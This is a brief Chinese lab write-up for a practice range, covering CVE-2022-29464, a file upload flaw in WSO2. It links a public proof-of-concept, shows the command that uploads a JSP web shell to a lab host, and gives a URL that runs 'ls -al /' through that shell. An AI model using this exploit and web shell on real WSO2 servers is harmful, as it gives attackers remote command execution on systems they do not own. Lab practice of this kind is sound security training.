爱春秋靶场 Cve 2022 29464 Wso2文件上传漏洞

By Yates0x00

Posted 2023-03-01 1 min read

refer to:
https://yunjing.ichunqiu.com/cve/detail/734?type=1&pay=2

思路：

对于首页，啥内容也看不出来。不要登录，方向错了。

对于这样的CVE，别绞尽脑汁了，直接拿POC拿来用就好。

poc:
https://github.com/hakivvi/CVE-2022-29464

用法：

1. 保存对应的 poc文件到本地。

2. 运行：

$ python cve_2022-29464_poc.py http://eci-2ze49cg5g8ojc7gfl6di.cloudeci1.ichunqiu.com:9445 shell.jsp
shell @ http://eci-2ze49cg5g8ojc7gfl6di.cloudeci1.ichunqiu.com:9445/authenticationendpoint/shell.jsp

3. 在浏览器中访问：

http://eci-2ze49cg5g8ojc7gfl6di.cloudeci1.ichunqiu.com:9445/authenticationendpoint/shell.jsp?cmd=ls+%2F+-al

ls -al /

This post is licensed under CC BY 4.0 by the author.

爱春秋靶场 Cve 2022 29464 Wso2文件上传漏洞

Further Reading

Security Websocket逆向的基本过程与浏览器的工具firefox Dev Tool Debugger的使用

Security Sqli_sql_injection手动payload

Security Crypto支付ssl_certificate_regery